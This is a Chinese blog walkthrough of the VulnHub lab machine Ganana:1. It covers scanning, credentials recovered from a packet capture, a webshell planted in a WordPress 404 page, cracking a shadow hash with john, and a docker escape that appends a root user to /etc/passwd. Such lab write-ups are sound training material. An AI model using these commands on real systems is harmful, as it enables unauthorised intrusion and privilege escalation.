vulnhub Ganana:1 解题思路

最新推荐文章于 2022-11-06 21:25:36 发布

置顶 weixin_39084441

最新推荐文章于 2022-11-06 21:25:36 发布

阅读量1k

点赞数

本文链接：https://blog.csdn.net/weixin_39084441/article/details/107059299

版权

vulnhub Ganana:1 解题思路

发现目标地址

1.目标主机网卡MAC地址为0800279564DD，如下所示；
在这里插入图片描述
2.使用以下命令扫描目标主机地址；

sudo netdiscover -r 192.168.2.1
192.168.2.134   08:00:27:95:64:dd      2     120  PCS Systemtechnik GmbH

信息收集

1.使用如下命令对目标进行端口扫描，如下所示；

nmap -vv --reason -Pn -A --osscan-guess --version-all -p- 192.168.2.134
22/tcp   closed ssh      conn-refused
80/tcp   open   http     syn-ack      Apache httpd (PHP 7.3.17)
443/tcp  open   ssl/http syn-ack      Apache httpd (PHP 7.3.17)
6777/tcp open   ftp      syn-ack      vsftpd 3.0.3

2.使用如下命令对目标进行服务扫描，如下所示；

nikto -h 192.168.2.134
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.134
+ Target Hostname:    192.168.2.134
+ Target Port:        80
+ Start Time:         2020-06-29 21:15:21 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ Retrieved x-powered-by header: PHP/7.3.17
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://192.168.2.134/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Cookie wordpress_test_cookie created without the httponly flag
+ Cookie goto created without the httponly flag
+ Cookie back created without the httponly flag
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3092: /secret/: This might be interesting...
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /wp-app.log: Wordpress' wp-app.log may leak application/system details.
+ /wordpresswp-app.log: Wordpress' wp-app.log may leak application/system details.
+ /: A Wordpress installation was found.
+ /wordpress: A Wordpress installation was found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7919 requests: 0 error(s) and 24 item(s) reported on remote host
+ End Time:           2020-06-29 21:21:53 (GMT-4) (392 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

3.根据nikto扫描结果得知，目标80端口使用wordpress框架，使用wpscan进行扫描，如下所示；

wpscan --url http://192.168.2.134 --enumerate ap,at,cb,dbe
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.1
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.2.134/ [192.168.2.134]
[+] Started: Mon Jun 29 21:18:56 2020

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache
 |  - X-Powered-By: PHP/7.3.17
 |  - X-Mod-Pagespeed: 1.13.35.2-0
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://192.168.2.134/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

4.使用dirb对目录进行扫描，得到如下结果；

https://192.168.2.134/tasks

在这里插入图片描述
5.根据提示可以猜测到用户名jarretlee，进行密码找回尝试；

6.根据提示可知账户正确，接下来根据提示寻找pcapng文件，经过构造，可以通过jarret.pcapng进行访问，如下所示；

http://192.168.2.134/jarret.pcapng

7.得到一个wireshark包，启动wireshark对文件进行分析；
在这里插入图片描述
8.经过查看流量包，得到如下信息；

jarretlee    nopassword
jarretlee    passwordis jarret
jarretlee    jarretLEE
jarretlee    NoBrUtEfOrCe__R3Qu1R3d__

在这里插入图片描述
9.使用账号密码登录尝试；

10.登录成功，发现草稿中存在一个base64密文，使用解密工具解密结果如下；

QGx3YXlzLUAtU3VwM3ItU2VjdXIzLXBAU1N3MFJkISE
@lways-@-Sup3r-Secur3-p@SSw0Rd!!

11.使用该密码登录wordpress不成功，登录phpmyadmin成功，如下所示；
在这里插入图片描述
12.查看wordpress用户密码，修改charleywalker密码，如下所示；

13.使用账号charleywalker和密码NoBrUtEfOrCe__R3Qu1R3d__进行登录，如下所示；

14.在404.php中写入恶意代码，如下所示；

获得初始shell

1.开启监听，构造反弹shell，对404页面访问尝试；
在这里插入图片描述

特权提升

1.使用如下命令获得TTY shell；

python3 -c 'import pty;pty.spawn("/bin/bash")'

2.查看用户列表发现该用户具有docker权限；

uid=1003(jeevan) gid=1005(jeevan) groups=1005(jeevan),115(docker)

3.使用用户jarretlee密码NoBrUtEfOrCe__R3Qu1R3d__切换用户到jarretlee，查看home文件，如下所示；
在这里插入图片描述
4.发现密文，使用base64解密，得到jeevan用户文件；

amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9jRG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6MDo5OTk5OTo3Ojo6
jeevan:$6$LXNakaBRJ/tL5F2a$bCgiylk/LY2MeFp5z9YZyiezsNsgj.5/cDohRgFRBNdrwi/2IPkUO0rqVIM3O8vysc48g3Zpo/sHuo.qwBf4U1:18430:0:99999:7:::

在这里插入图片描述
5.使用john进行破解，如下所示；

kali@kali:~/oscp/passwd/john$ sudo john --rules --wordlist=/usr/share/wordlists/rockyou.txt passswdhadow.txt 
[sudo] password for kali: 
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hannahmontana    (jeevan)
1g 0:00:00:01 DONE (2020-06-30 22:34) 0.5617g/s 1438p/s 1438c/s 1438C/s slimshady..hassan
Use the "--show" option to display all of the cracked passwords reliably
Session completed

在这里插入图片描述
6.得到密码hannahmontana (jeevan)，切换用户，使用docker提权；

docker run -v /etc/:/mnt -it alpine
cd /mnt
echo 'raj:$6$BiEAYF4pzDp5QJXH$00iURpImugngJWdAraUxBFfU76xovc6mwuQMe479uN28NesybQxOW7TiLxqrn99nJCfvISJtJiXgIjtTicF720:0:0:root:/root:/bin/bash' >> passwd

在这里插入图片描述

/mnt # exit    
exit
jeevan@debian:/home/jarretlee$ su raj
su raj
Password: kali

root@debian:/home/jarretlee#

在这里插入图片描述
7.提权成功，查看证明文件。；

因为中间关机过，所以目标地址变化过，由于我是新手，有不对的地方欢迎大家指正。

weixin_39084441

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
vulnhub Ganana:1 解题思路

vulnhub Ganana:1 解题思路vulnhub Ganana:1发现目标地址功能快捷键合理的创建标题，有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能，丰富你的文章UML 图表FLowchart流程图导出与导入导出导入vulnhub Ganana:1你好！这是你第一次使用 Markdown编辑器所展示的欢迎
复制链接

扫一扫